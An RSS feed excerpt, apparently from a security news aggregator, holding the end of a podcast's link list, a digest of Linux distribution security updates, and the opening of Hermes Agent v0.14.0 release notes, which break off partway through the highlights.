https://www.trinitydesktop.org/</a>

</p>

<p>

</p>

<p>

XFCE
</p>

<p>

</p>

<p>

<a href="https://www.xfce.org/" rel="noopener noreferrer" target="_blank">
https://www.xfce.org/</a>

</p>

<p>

</p>

<p>

</p>

<p>

Chrome OS
</p>

<p>

</p>

<p>

<a href="https://chromeos.google/" rel="noopener noreferrer" target="_blank">
https://chromeos.google/</a>

</p>

<p>

</p>

<p>

SSH
</p>

<p>

</p>

<p>

<a href="https://www.ssh.com/" rel="noopener noreferrer" target="_blank">
https://www.ssh.com/</a>

</p>

<p>

</p>

<p>

Onshape
</p>

<p>

</p>

<p>

<a href="https://www.onshape.com/en/" rel="noopener noreferrer" target="_blank">
https://www.onshape.com/en/</a>

</p>

<p>

</p>

<p>

TinkerCAD
</p>

<p>

</p>

<p>

<a href="https://www.tinkercad.com/" rel="noopener noreferrer" target="_blank">
https://www.tinkercad.com/</a>

</p>

<p>

</p>

<p>

Thorium OS
</p>

<p>

</p>

<p>

<a href="https://thorium.rocks/thoriumos" rel="noopener noreferrer" target="_blank">
https://thorium.rocks/thoriumos</a>

</p>

<p>

</p>

<p>

Tech And Coffee
</p>

<p>

</p>

<p>

<a href="https://techandcoffee.info/" rel="noopener noreferrer" target="_blank">
https://techandcoffee.info/</a>

</p>

<p>

</p>

<p>

Panera
</p>

<p>

</p>

<p>

<a href="https://www.panerabread.com/en-us/home.html" rel="noopener noreferrer" target="_blank">
https://www.panerabread.com/en-us/home.html</a>

</p>

<p>

</p>

<p>

IHOP
</p>

<p>

</p>

<p>

<a href="https://www.panerabread.com/en-us/home.html" rel="noopener noreferrer" target="_blank">
https://www.panerabread.com/en-us/home.html</a>

</p>

<p>

</p>

<p>

Waffle House
</p>

<p>

</p>

<p>

<a href="https://www.wafflehouse.com/" rel="noopener noreferrer" target="_blank">
https://www.wafflehouse.com/</a>

</p>

<p>

</p>

<p>

In And Out Burger
</p>

<p>

</p>

<p>

<a href="https://www.in-n-out.com/" rel="noopener noreferrer" target="_blank">
https://www.in-n-out.com/</a>

</p>

<p>

</p>

<p>

Economies Of Scale
</p>

<p>

</p>

<p>

<a href="https://www.investopedia.com/terms/e/economiesofscale.asp" rel="noopener noreferrer" target="_blank">
https://www.investopedia.com/terms/e/economiesofscale.asp</a>

</p>

<p>

</p>

<p>

Dunkin Donuts
</p>

<p>

</p>

<p>

<a href="https://www.dunkindonuts.com/en" rel="noopener noreferrer" target="_blank">
https://www.dunkindonuts.com/en</a>

</p>

<p>

</p>

<p>

F-Droid
</p>

<p>

</p>

<p>

<a href="https://f-droid.org/en/" rel="noopener noreferrer" target="_blank">
https://f-droid.org/en/</a>

</p>

<p>

</p>

<p>

Cheap Yellow Display
</p>

<p>

</p>

<p>

<a href="https://blog.decryption.net.au/posts/cyd-for-beginners.html" rel="noopener noreferrer" target="_blank">
https://blog.decryption.net.au/posts/cyd-for-beginners.html</a>

</p>

<p>

</p>

<p>

NTP Server
</p>

<p>

</p>

<p>

<a href="https://www.ntppool.org/en/" rel="noopener noreferrer" target="_blank">
https://www.ntppool.org/en/</a>

</p>

<p>

</p>

<p>

Beagle (Dog)
</p>

<p>

</p>

<p>

<a href="https://www.akc.org/dog-breeds/beagle/" rel="noopener noreferrer" target="_blank">
https://www.akc.org/dog-breeds/beagle/</a>

</p>

<p>

</p>

<p>

Siamese Cat
</p>

<p>

</p>

<p>

<a href="https://www.life-with-siamese-cats.com/" rel="noopener noreferrer" target="_blank">
https://www.life-with-siamese-cats.com/</a>

</p>

<p>

</p>

<p>

Bsides InfoSec Conference - Knoxville, TN
</p>

<p>

</p>

<p>

<a href="https://www.papercall.io/bsides-knoxville-2026" rel="noopener noreferrer" target="_blank">
https://www.papercall.io/bsides-knoxville-2026</a>

</p>

<p>

</p>

<p>

CI/CD Pipeline
</p>

<p>

</p>

<p>

<a href="https://circleci.com/blog/what-is-a-ci-cd-pipeline/" rel="noopener noreferrer" target="_blank">
https://circleci.com/blog/what-is-a-ci-cd-pipeline/</a>

</p>

<p>

</p>

<p>

Strace Command
</p>

<p>

</p>

<p>

<a href="https://www.geeksforgeeks.org/linux-unix/strace-command-in-linux-with-examples/" rel="noopener noreferrer" target="_blank">
https://www.geeksforgeeks.org/linux-unix/strace-command-in-linux-with-examples/</a>

</p>

<p>

</p>

<p>

High Pass Filter
</p>

<p>

</p>

<p>

<a href="https://www.izotope.com/en/learn/6-ways-to-use-a-high-pass-filter-when-mixing" rel="noopener noreferrer" target="_blank">
https://www.izotope.com/en/learn/6-ways-to-use-a-high-pass-filter-when-mixing</a>

</p>

<p>

</p>

<p>

Waters &amp; Stanton - Radio Shop
</p>

<p>

</p>

<p>

<a href="https://www.hamradiostore.co.uk/" rel="noopener noreferrer" target="_blank">
https://www.hamradiostore.co.uk/</a>

</p>

<p>

</p>

<p>

Home Assistant
</p>

<p>

</p>

<p>

<a href="https://www.home-assistant.io/" rel="noopener noreferrer" target="_blank">
https://www.home-assistant.io/</a>

</p>

<p>

</p>

<p>

ESP 32
</p>

<p>

</p>

<p>

<a href="https://www.espressif.com/en/products/socs/esp32" rel="noopener noreferrer" target="_blank">
https://www.espressif.com/en/products/socs/esp32</a>

</p>

<p>

</p>

<p>

EMF Camp
</p>

<p>

</p>

<p>

<a href="https://www.emfcamp.org/" rel="noopener noreferrer" target="_blank">
https://www.emfcamp.org/</a>

</p>

<p>

</p>

<p>

YAML
</p>

<p>

</p>

<p>

<a href="https://yaml.org/" rel="noopener noreferrer" target="_blank">
https://yaml.org/</a>

</p>

<p>

</p>

<p>

ChatGPT
</p>

<p>

</p>

<p>

<a href="https://chatgpt.com/" rel="noopener noreferrer" target="_blank">
https://chatgpt.com/</a>

</p>

<p>

</p>

<p>

TOR
</p>

<p>

</p>

<p>

<a href="https://www.torproject.org/" rel="noopener noreferrer" target="_blank">
https://www.torproject.org/</a>

</p>

<p>

</p>

<p>

IPTables
</p>

<p>

</p>

<p>

<a href="https://linux.die.net/man/8/iptables" rel="noopener noreferrer" target="_blank">
https://linux.die.net/man/8/iptables</a>

</p>

<p>

</p>

<p>

<a href="https://ccrma.stanford.edu/planetccrma/man/man8/ipchains.8.html" rel="noopener noreferrer" target="_blank">
https://ccrma.stanford.edu/planetccrma/man/man8/ipchains.8.html</a>

</p>

<p>

</p>

<p>

RSYNC
</p>

<p>

</p>

<p>

<a href="https://linux.die.net/man/1/rsync" rel="noopener noreferrer" target="_blank">
https://linux.die.net/man/1/rsync</a>

</p>

<p>

</p>

<p>

SYM Link
</p>

<p>

</p>

<p>

<a href="https://stackoverflow.com/questions/1951742/how-can-i-symlink-a-file-in-linux" rel="noopener noreferrer" target="_blank">
https://stackoverflow.com/questions/1951742/how-can-i-symlink-a-file-in-linux</a>

</p>

<p>

</p>

<p>

CDN (Content Delivery Network)
</p>

<p>

</p>

<p>

<a href="https://www.cloudflare.com/learning/cdn/what-is-a-cdn/" rel="noopener noreferrer" target="_blank">
https://www.cloudflare.com/learning/cdn/what-is-a-cdn/</a>

</p>

<p>

</p>

<p>

Mastadon
</p>

<p>

</p>

<p>

<a href="https://joinmastodon.org/" rel="noopener noreferrer" target="_blank">
https://joinmastodon.org/</a>

</p>

<p>

</p>

<p>

DuoLingo
</p>

<p>

</p>

<p>

<a href="https://www.duolingo.com/" rel="noopener noreferrer" target="_blank">
https://www.duolingo.com/</a>

</p>

<p>

</p>

<p>

Fedora
</p>

<p>

</p>

<p>

<a href="https://en.wikipedia.org/wiki/Fedora" rel="noopener noreferrer" target="_blank">
https://en.wikipedia.org/wiki/Fedora</a>

</p>

<p>

</p>

<p>

Pea Coat
</p>

<p>

</p>

<p>

<a href="https://www.artofmanliness.com/style/clothing/mans-guide-pea-coat/" rel="noopener noreferrer" target="_blank">
https://www.artofmanliness.com/style/clothing/mans-guide-pea-coat/</a>

</p>

<p>

</p>

<p>

Haiku
</p>

<p>

</p>

<p>

<a href="https://www.haiku-os.org/" rel="noopener noreferrer" target="_blank">
https://www.haiku-os.org/</a>

</p>

<p>

</p>

<p>

Hunt Brothers Pizza
</p>

<p>

</p>

<p>

<a href="https://www.huntbrotherspizza.com/" rel="noopener noreferrer" target="_blank">
https://www.huntbrotherspizza.com/</a>

</p>

<p>

</p>

<p>

Papa Johns Pizza
</p>

<p>

</p>

<p>

<a href="https://www.papajohns.com/omni/en" rel="noopener noreferrer" target="_blank">
https://www.papajohns.com/omni/en</a>

</p>

<p>

</p>

<p>

PIzza Hut
</p>

<p>

</p>

<p>

<a href="https://www.pizzahut.com/" rel="noopener noreferrer" target="_blank">
https://www.pizzahut.com/</a>

</p>

<p>

</p>

<p>

Dominos Pizza
</p>

<p>

</p>

<p>

<a href="https://www.dominos.com/" rel="noopener noreferrer" target="_blank">
https://www.dominos.com/</a>

</p>

<p>

</p>

<p>

Marcos Pizza
</p>

<p>

</p>

<p>

<a href="https://www.marcos.com/" rel="noopener noreferrer" target="_blank">
https://www.marcos.com/</a>

</p>

<p>

</p>

<p>

Little Ceasars Pizza
</p>

<p>

</p>

<p>

<a href="https://littlecaesars.com/en-us/" rel="noopener noreferrer" target="_blank">
https://littlecaesars.com/en-us/</a>

</p>

<p>

</p>

<p>

Hungry Howies Pizza
</p>

<p>

</p>

<p>

<a href="https://www.hungryhowies.com/" rel="noopener noreferrer" target="_blank">
https://www.hungryhowies.com/</a>

</p>

<p>

</p>

<p>

MOD Pizza
</p>

<p>

</p>

<p>

<a href="https://modpizza.com/" rel="noopener noreferrer" target="_blank">
https://modpizza.com/</a>

</p>

<p>

</p>

<p>

Papa Murphys Pizza
</p>

<p>

</p>

<p>

<a href="https://www.papamurphys.com/" rel="noopener noreferrer" target="_blank">
https://www.papamurphys.com/</a>

</p>

<p>

</p>

<p>

Wolfman Pizza
</p>

<p>

</p>

<p>

<a href="https://wolfmanpizza.com/" rel="noopener noreferrer" target="_blank">
https://wolfmanpizza.com/</a>

</p>

<p>

</p>

<p>

Fuel Pizza
</p>

<p>

</p>

<p>

<a href="https://www.fuelpizza.com/" rel="noopener noreferrer" target="_blank">
https://www.fuelpizza.com/</a>

</p>

<p>

</p>

<p>

Shallow Hal
</p>

<p>

</p>

<p>

<a href="https://www.rottentomatoes.com/m/shallow_hal" rel="noopener noreferrer" target="_blank">
https://www.rottentomatoes.com/m/shallow_hal</a>

</p>

<p>

</p>

<p>

South Coast Pizza
</p>

<p>

</p>

<p>

<a href="https://southcoastpizza.com/" rel="noopener noreferrer" target="_blank">
https://southcoastpizza.com/</a>

</p>

<p>

</p>

<p>

Casa Dora
</p>

<p>

</p>

<p>

<a href="https://www.casadoraitaliancusinepizzeria.com/" rel="noopener noreferrer" target="_blank">
https://www.casadoraitaliancusinepizzeria.com/</a>

</p>

<p>

</p>

<p>

National Pizza Day
</p>

<p>

</p>

<p>

<a href="https://www.nationaldaycalendar.com/national-day/national-pizza-day-february-9" rel="noopener noreferrer" target="_blank">
https://www.nationaldaycalendar.com/national-day/national-pizza-day-february-9</a>

</p>

<p>

</p>

<p>

Sagitarius
</p>

<p>

</p>

<p>

<a href="https://www.zodiacsign.com/zodiac-signs/sagittarius/" rel="noopener noreferrer" target="_blank">
https://www.zodiacsign.com/zodiac-signs/sagittarius/</a>

</p>

<p>

</p>

<p>

Alexa
</p>

<p>

</p>

<p>

<a href="https://alexa.amazon.com/userProfile?redirectTo=%2F" rel="noopener noreferrer" target="_blank">
https://alexa.amazon.com/userProfile?redirectTo=%2F</a>

</p>

<p>

</p>

<p>

Gemini
</p>

<p>

</p>

<p>

<a href="https://gemini.google.com/app" rel="noopener noreferrer" target="_blank">
https://gemini.google.com/app</a>

</p>

<p>

</p>

<p>

Netscape
</p>

<p>

</p>

<p>

<a href="https://isp.netscape.com/" rel="noopener noreferrer" target="_blank">
https://isp.netscape.com/</a>

</p>

<p>

</p>

<p>

Seamonkey
</p>

<p>

</p>

<p>

<a href="https://www.seamonkey-project.org/" rel="noopener noreferrer" target="_blank">
https://www.seamonkey-project.org/</a>

</p>

<p>

</p>

<p>

Thunderbird
</p>

<p>

</p>

<p>

<a href="https://www.thunderbird.net/en-US/" rel="noopener noreferrer" target="_blank">
https://www.thunderbird.net/en-US/</a>

</p>

<p>

</p>

<p>

ULC Minister
</p>

<p>

</p>

<p>

<a href="https://www.ulc.org/" rel="noopener noreferrer" target="_blank">
https://www.ulc.org/</a>

</p>

<p>

</p>

<p>

Church Of Spiritual Humanism
</p>

<p>

</p>

<p>

<a href="https://spiritualhumanism.org/" rel="noopener noreferrer" target="_blank">
https://spiritualhumanism.org/</a>

</p>

<p>

</p>

<p>

Oberon Zelle Ravenheart
</p>

<p>

</p>

<p>

<a href="https://en.wikipedia.org/wiki/Oberon_Zell-Ravenheart" rel="noopener noreferrer" target="_blank">
https://en.wikipedia.org/wiki/Oberon_Zell-Ravenheart</a>

</p>

<p>

</p>

<p>

Temple of Wicca 
</p>

<p>

</p>

<p>

<a href="https://www.wiccanfamilytemple.org/" rel="noopener noreferrer" target="_blank">
https://www.wiccanfamilytemple.org/</a>

</p>

<p>

</p>

<p>

Church Of All Worlds
</p>

<p>

</p>

<p>

<a href="https://caw.org/" rel="noopener noreferrer" target="_blank">
https://caw.org/</a>

</p>

<p>

</p>

<p>

Progressive Universal Life Church
</p>

<p>

</p>

<p>

<a href="https://www.thepulc.com/" rel="noopener noreferrer" target="_blank">
https://www.thepulc.com/</a>

</p>

<p>

</p>

<p>

Pine Time
</p>

<p>

</p>

<p>

<a href="https://pine64.org/devices/pinetime/" rel="noopener noreferrer" target="_blank">
https://pine64.org/devices/pinetime/</a>

</p>

<p>

</p>

<p>

AmazFit Watch
</p>

<p>

</p>

<p>

<a href="https://us.amazfit.com/" rel="noopener noreferrer" target="_blank">
https://us.amazfit.com/</a>

</p>

<p>

</p>

<p>

Zepp App 
</p>

<p>

</p>

<p>

<a href="https://play.google.com/store/apps/details?id=com.huami.watch.hmwatchmanager&amp;hl=en_US&amp;pli=1" rel="noopener noreferrer" target="_blank">
https://play.google.com/store/apps/details?id=com.huami.watch.hmwatchmanager&amp;hl=en_US&amp;pli=1</a>

</p>

<p>

</p>

<p>

Pegasus Mail
</p>

<p>

</p>

<p>

<a href="https://www.pmail.com/" rel="noopener noreferrer" target="_blank">
https://www.pmail.com/</a>

</p>

<p>

</p>

<p>

Eudora
</p>

<p>

</p>

<p>

<a href="https://en.wikipedia.org/wiki/Eudora_(email_client)" rel="noopener noreferrer" target="_blank">
https://en.wikipedia.org/wiki/Eudora_(email_client)</a>

</p>

<p>

</p>

<p>

Proton Mail
</p>

<p>

</p>

<p>

<a href="https://proton.me/mail" rel="noopener noreferrer" target="_blank">
https://proton.me/mail</a>

</p>

<p>

</p>

<p>

AOL
</p>

<p>

</p>

<p>

<a href="https://www.aol.com/" rel="noopener noreferrer" target="_blank">
https://www.aol.com/</a>

</p>

<p>

</p>

<p>

OpenSuse
</p>

<p>

</p>

<p>

<a href="https://www.opensuse.org/" rel="noopener noreferrer" target="_blank">
https://www.opensuse.org/</a>

</p>

<p>

</p>

<p>

Mandrake Linux
</p>

<p>

</p>

<p>

<a href="https://www.mandrakelinux.org/" rel="noopener noreferrer" target="_blank">
https://www.mandrakelinux.org/</a>

</p>

<p>

</p>

<p>

Virtualbox
</p>

<p>

</p>

<p>

<a href="https://www.virtualbox.org/" rel="noopener noreferrer" target="_blank">
https://www.virtualbox.org/</a>

</p>

<p>

</p>

<p>

Bitcoin
</p>

<p>

</p>

<p>

<a href="https://bitcoin.org/en/" rel="noopener noreferrer" target="_blank">
https://bitcoin.org/en/</a>

</p>

<p>

</p>

<p>

Norway
</p>

<p>

</p>

<p>

<a href="https://www.visitnorway.com/" rel="noopener noreferrer" target="_blank">
https://www.visitnorway.com/</a>

</p>

<p>

</p>

<p>

XFCE
</p>

<p>

</p>

<p>

<a href="https://www.xfce.org/" rel="noopener noreferrer" target="_blank">
https://www.xfce.org/</a>

</p>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4642/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (freerdp, gimp:2.8, jq, kernel, and rsync), Debian (chromium, ffmpeg, firewalld, kernel, nginx, openjpeg2, openssh, php7.4, and redis), Fedora (apptainer, chromium, coturn, dnsmasq, firefox, kernel, libgit2_1.8, libmetal, nginx, nginx-mod-brotli, ngi...]]></description>
<link>https://tsecurity.de/de/3526095/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3526095/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 18 May 2026 15:26:52 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (freerdp, gimp:2.8, jq, kernel, and rsync), <b>Debian</b> (chromium, ffmpeg, firewalld, kernel, nginx, openjpeg2, openssh, php7.4, and redis), <b>Fedora</b> (apptainer, chromium, coturn, dnsmasq, firefox, kernel, libgit2_1.8, libmetal, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-js-challenge, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, open-amp, perl-Net-CIDR-Lite, pgbouncer, pypy, python-jupytext, python-uv-build, rsync, rust-astral-tokio-tar, uriparser, uv, valkey, and yelp), <b>Mageia</b> (dpkg, firefox, thunderbird, golang, haproxy, and samba), <b>Slackware</b> (dnsmasq and kernel), and <b>SUSE</b> (apache-commons-configuration2, apache2, apptainer, chromedriver, cups-filters, curl, dnsmasq, expat, ffmpeg-4, ffmpeg-7, firebird, firewalld, flux2-cli, glibc, go1.25, go1.26, gosec, grub2, ImageMagick, java-11-openj9, java-17-openj9, java-1_8_0-openj9, java-1_8_0-openjdk, java-21-openj9, java-25-openj9, kdenlive, kernel, kernel-devel, keylime-config, krb5, libIex-3_4-33, mozjs115, mozjs78, nginx, openssh, openvswitch, ovmf, PackageKit, perl-Crypt-URandom, perl-CryptX, perl-libwww-perl, perl-Net-CIDR-Lite, perl-Text-CSV_XS, podman, postgresql17, postgresql18, python-pyOpenSSL, python310, rsync, sed, tekton-cli, valkey, xen, and zypper-docker).]]></content:encoded>
</item>
<item>
<title><![CDATA[Hermes Agent v0.14.0 (2026.5.16)]]></title>
<description><![CDATA[Hermes Agent v0.14.0 (v2026.5.16)
Release Date: May 16, 2026
Since v0.13.0: 808 commits · 633 merged PRs · 1393 files changed · 165,061 insertions · 545 issues closed (12 P0, 50 P1) · 215 community contributors (including co-authors)

The Foundation Release — Hermes Agent installs and runs anywhe...]]></description>
<link>https://tsecurity.de/de/3521849/downloads/hermes-agent-v0140-2026516/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3521849/downloads/hermes-agent-v0140-2026516/</guid>
<pubDate>Sat, 16 May 2026 12:01:41 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Hermes Agent v0.14.0 (v2026.5.16)</h1>
<p><strong>Release Date:</strong> May 16, 2026<br>
<strong>Since v0.13.0:</strong> 808 commits · 633 merged PRs · 1393 files changed · 165,061 insertions · 545 issues closed (12 P0, 50 P1) · 215 community contributors (including co-authors)</p>
<blockquote>
<p>The Foundation Release — Hermes Agent installs and runs anywhere now. Native Windows ships in early beta with a full PowerShell installer story, a <code>pip install hermes-agent</code> wheel lands on PyPI, lazy-deps reshape what <code>pip install hermes-agent</code> actually pulls down, the supply-chain checker scans every install/upgrade for unsafe versions, and a new OpenAI-compatible local proxy lets Codex / Aider / Cline talk to OAuth-only providers (Claude Pro, ChatGPT Pro, SuperGrok). The cold-start wave shaves ~19 seconds off <code>hermes</code> launch, browser-tool CDP calls run 180x faster, and <code>hermes tools</code> All-Platforms drops from 14s to under 1.5s. Two new messaging platforms (LINE and SimpleX Chat) and a Microsoft Graph foundation (Teams pipeline + webhook adapter) land alongside <code>/handoff</code> that finally transfers sessions live, <code>vision_analyze</code> passing pixels through to vision-capable models, <code>x_search</code> as a first-class tool, LSP semantic diagnostics on every <code>write_file</code> / <code>patch</code>, a unified pluggable <code>video_generate</code>, a <code>computer_use</code> cua-driver backend, cross-session 1-hour Claude prompt caching, a per-turn file-mutation verifier, plus 9 new optional skills. 50+ P1 closures, 12 P0 closures.</p>
</blockquote>
<hr>
<h2>✨ Highlights</h2>
<ul>
<li>
<p><strong>Native Windows support (early beta)</strong> — full PowerShell installer, native subprocess/PTY paths, taskkill-based process management, MinGit auto-install, Microsoft Store python stub detection, foreground Ctrl+C preservation, taskkill+ps2 fallback, npm prefix handling, and ~40 follow-up Windows-only fixes across CLI / gateway / TUI / curator / tools. Hermes finally runs natively on <code>cmd.exe</code> and PowerShell, no WSL required. (<a href="https://github.com/NousResearch/hermes-agent/pull/21561" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21561/hovercard">#21561</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/22130" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22130/hovercard">#22130</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/22752" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22752/hovercard">#22752</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/26618" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26618/hovercard">#26618</a>, and many more)</p>
</li>
<li>
<p><strong><code>pip install hermes-agent &amp;&amp; hermes</code></strong> — Hermes Agent is now a real PyPI package. One command, no clone, no git, no shell installer. Wheel includes the Ink TUI bundle and shell launcher. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/26350" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26350/hovercard">#26350</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26593" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26593/hovercard">#26593</a>)</p>
</li>
<li>
<p><strong>Cold-start performance wave — ~19s off <code>hermes</code> launch</strong> — skills cache, lazy Feishu import, no Nous HTTP at startup, plus PEP-562 lazy adapter imports (QQ, Yuanbao, Teams, Google Chat), deferred <code>fal_client</code> / <code>google-cloud</code> / <code>httpx</code> loads, models.dev disk-cache-first lookup, parallel doctor API checks, eager-skip plugin discovery on built-in subcommands, <code>hermes tools</code> All-Platforms drops from 14s to &lt;1.5s, welcome banner skipped on <code>chat -q</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/22138" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22138/hovercard">#22138</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/22120" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22120/hovercard">#22120</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/22681" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22681/hovercard">#22681</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/22790" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22790/hovercard">#22790</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/22808" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22808/hovercard">#22808</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/22831" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22831/hovercard">#22831</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/22859" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22859/hovercard">#22859</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/22904" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22904/hovercard">#22904</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/22766" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22766/hovercard">#22766</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/25341" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25341/hovercard">#25341</a>)</p>
</li>
<li>
<p><strong>180x faster <code>browser_console</code> evaluations</strong> — routed through the supervisor's persistent CDP WebSocket instead of spawning a fresh DevTools session per call. Real-world page interactions feel instant. (<a href="https://github.com/NousResearch/hermes-agent/pull/23226" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23226/hovercard">#23226</a>)</p>
</li>
<li>
<p><strong>Supply-chain advisory checker + lazy-deps framework + tiered install fallback</strong> — every <code>pip install</code> / <code>hermes update</code> scans dependencies against an advisory list, lazy-deps replace heavy import-time loads with first-use installs, and the installer falls back through extras tiers when a wheel rejects on the target platform. (<a href="https://github.com/NousResearch/hermes-agent/pull/24220" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24220/hovercard">#24220</a>)</p>
</li>
<li>
<p><strong>OpenAI-compatible local proxy</strong> — <code>hermes proxy</code> exposes any OAuth-authed provider (Claude Pro, ChatGPT Pro, SuperGrok) as an OpenAI-compatible endpoint that Codex / Aider / Cline / VS Code Continue can hit. Your subscription, your tools. (<a href="https://github.com/NousResearch/hermes-agent/pull/25969" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25969/hovercard">#25969</a>)</p>
</li>
<li>
<p><strong>Cross-session 1-hour Claude prompt cache</strong> — Anthropic / OpenRouter / Nous Portal now share a 1h prefix cache across sessions for Claude models. Fast resume, fast <code>/new</code>, lower cost on repeat work. (<a href="https://github.com/NousResearch/hermes-agent/pull/23828" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23828/hovercard">#23828</a>)</p>
</li>
<li>
<p><strong>Two new messaging platforms — LINE + SimpleX Chat</strong> — LINE Messaging API lands as a first-class platform, SimpleX Chat salvages <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117407388" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/2558" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/2558/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/2558">#2558</a> onto the modern adapter spec. Hermes is now on 22 platforms. (<a href="https://github.com/NousResearch/hermes-agent/pull/23197" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23197/hovercard">#23197</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/26232" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26232/hovercard">#26232</a>)</p>
</li>
<li>
<p><strong>Microsoft Graph foundation — Teams pipeline + webhook adapter</strong> — <code>msgraph</code> auth/client foundation, webhook listener platform, Teams pipeline plugin runtime, and Teams outbound delivery via the existing adapter — Hermes can now read and post to Teams. (salvages of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4400317607" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/21408" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21408/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/21408">#21408</a>–<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4400321291" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/21411" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21411/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/21411">#21411</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/21922" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21922/hovercard">#21922</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/21969" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21969/hovercard">#21969</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/22007" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22007/hovercard">#22007</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/22024" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22024/hovercard">#22024</a>)</p>
</li>
<li>
<p><strong><code>/handoff</code> actually transfers the session live</strong> — the agent's active session moves to a different model / persona / profile mid-conversation, with messages, tool history, and context preserved. (<a href="https://github.com/NousResearch/hermes-agent/pull/23395" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23395/hovercard">#23395</a>)</p>
</li>
<li>
<p><strong><code>x_search</code> — first-class X (Twitter) search tool</strong> — gated tool with OAuth-or-API-key auth, no skill needed to query the timeline. (<a href="https://github.com/NousResearch/hermes-agent/pull/26763" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26763/hovercard">#26763</a>)</p>
</li>
<li>
<p><strong><code>vision_analyze</code> returns pixels to vision-capable models</strong> — when the active model can see, <code>vision_analyze</code> now hands the image straight through instead of falling back to a text description. (<a href="https://github.com/NousResearch/hermes-agent/pull/22955" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22955/hovercard">#22955</a>)</p>
</li>
<li>
